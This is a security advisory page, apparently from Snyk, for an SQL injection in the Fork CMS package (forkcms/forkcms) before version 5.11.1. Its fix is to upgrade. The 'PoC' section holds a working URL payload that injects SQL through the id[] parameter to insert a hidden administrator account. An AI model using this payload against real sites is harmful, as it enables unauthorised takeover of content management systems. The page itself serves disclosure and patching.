SQL Injection Affecting forkcms/forkcms package, versions <5.11.1


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.1% (43rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about SQL Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PHP-FORKCMSFORKCMS-6056533
  • published25 Mar 2022
  • disclosed25 Mar 2022
  • creditstarkitsec

Introduced: 25 Mar 2022

CVE-2022-1064  (opens in a new tab)
CWE-89  (opens in a new tab)

How to fix?

Upgrade forkcms/forkcms to version 5.11.1 or higher.

Overview

forkcms/forkcms is an easy to use open source CMS using Symfony Components

Affected versions of this package are vulnerable to SQL Injection via the id[] parameter when deleting submissions which belong to a formular (made with module FormBuilder).

PoC

http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete

NOTE: This vulnerability has also been identified as: CVE-2022-0153

References

CVSS Scores

version 3.1